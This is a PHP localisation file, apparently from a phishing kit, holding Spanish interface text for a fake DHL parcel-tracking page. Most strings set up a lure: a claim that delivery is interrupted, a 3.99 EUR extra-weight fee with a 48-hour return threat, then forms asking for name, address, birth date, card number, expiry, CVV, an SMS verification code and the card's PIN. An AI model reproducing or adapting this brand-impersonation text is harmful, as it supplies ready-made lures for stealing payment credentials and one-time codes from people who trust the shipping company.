<?php

function lang($phrase){
	static $lang = array(

		'xTitle' => 'Logística global - Envíos internacionales | Inicio de DHL',
'xContactUs' => 'Contáctenos',
'xPortalLogin' => 'Iniciar sesión en el portal',
'xSearch' => 'Buscar',
'xTrackNav' => 'Rastrear',
'xAllProducts&Solutions' => 'Todos los productos y soluciones',
'xNuestrasDivisiones' => 'Nuestras Divisiones',
'xIndustrySectors' => 'Sectores de la Industria',
'xInformación e innovación' => 'Información e innovación',
'xCarreras' => 'Carreras',
'xPresionar' => 'Presionar',
'xAboutUs' => 'Acerca de nosotros',
'xTrackYourShipment' => 'Rastrear su envío',
'xEnteryourEmail' => 'Ingrese su correo electrónico',
'xTrackBtn' => 'Pista',
'xDHLExpressReferenceTracking' => 'Seguimiento de referencia de DHL Express',
'xShippingServices' => 'Servicios de envío',
'xPaquetes' => 'Paquetes',
'xDocumentParcel' => 'Documento y paquete',
'xAirFreight' => 'Transporte Aéreo',
'xOceanFreight' => 'Transporte Marítimo',
'xRoadFreight' => 'Carga por carretera',
'xRailFreight' => 'Transporte ferroviario',
'xSíguenos' => 'Síguenos',
'xDeutschePostDHLGroup' => 'Grupo Deutsche Post DHLGroup',
'xReadmoreaboutFraudAwareness' => 'Concienciación sobre el fraude',
'xReadmoreaboutLegalNotice' => 'Aviso legal',
'xTermsofUse' => 'Términos de uso',
'xPrivacyNotice' => 'Aviso de privacidad',
'xDisputeResolution' => 'Resolución de disputas',
'xAccesibilidad' => 'Accesibilidad',
'xCookieSettings' => 'Configuración de cookies',
'xDesde' => 'Desde',
'xExpectedDelivery' => 'Entrega Esperada',
'xImpuestos' => 'Impuestos',
'xExplainHeading' => 'Entrega interrumpida',
'xDelv' => 'Entrega esperada',
'xPackagenumber' => 'Número de paquete',
'xBinfo' => '(Información de facturación)',
'xBpay' => '(Pago)',
'xBauth' => '(Autenticación)',
'xBh1t' => 'Confirma tus datos de facturación',
'xHexplain' => 'Entrega interrumpida',
'xp1' => 'Su última entrega ha sido interrumpida. Actualmente está en espera en el centro de clasificación',
'xp2' => 'Su paquete no respetó el peso indicado, entonces se le solicitan costos adicionales para poder transportar su paquete correctamente.',
'xp3' => 'La tarifa es de 3.99EUR Para pagar, haga clic en el botón de abajo',
'xp4' => 'Una vez pagadas las tarifas, su paquete será enviado lo más rápido posible al lugar de entrega.',
'xp5' => 'En caso de que estos no se liquiden en las próximas 48 horas, el paquete será devuelto al remitente.',
'xname' => 'Nombre completo',
'xdirección' => 'Dirección',
'xpaís' => 'País',
'xcity' => 'Ciudad',
'xphone' => 'Número de teléfono',
'xdate' => 'Fecha de nacimiento',
'xCpoaf' => 'Pago de tasas adicionales',
'xcch' => 'Titular de la tarjeta de crédito',
'xccn' => 'Número de tarjeta de crédito',
'xexp' => 'Fecha de vencimiento (mm/aa)',
'xcvv' => 'Código (CVV)',
"xAauth" => "Autenticación",
"xAp1" => "Para proceder con su pago, por favor introduzca el código de verificación enviado a su número de móvil",
"xAcp" => "Código",
'xAp2' => 'Por favor ingrese el código que recibió por (SMS)',
'xHp' => 'Pago exitoso',
'xRod' => 'Reanudación de la entrega',
'xP1fin' => 'Se ha tenido en cuenta el pago de los costes adicionales.',
'xP2fin' => 'Su paquete debería llegar para su entrega dentro de las próximas 24 horas.',
'xPay' => 'Pagar ahora',
'xCnt' => 'Continuar',
'xFinalizar' => 'Finalizar',
"xpin1" => "Para validar su pago, introduzca el código PIN de su tarjeta",
"xpin2" => "Código PIN",
"xpin3" => "Por favor, introduzca el código PIN de 4 dígitos de su tarjeta"

	);	
	
	return $lang[$phrase];
}
 ?>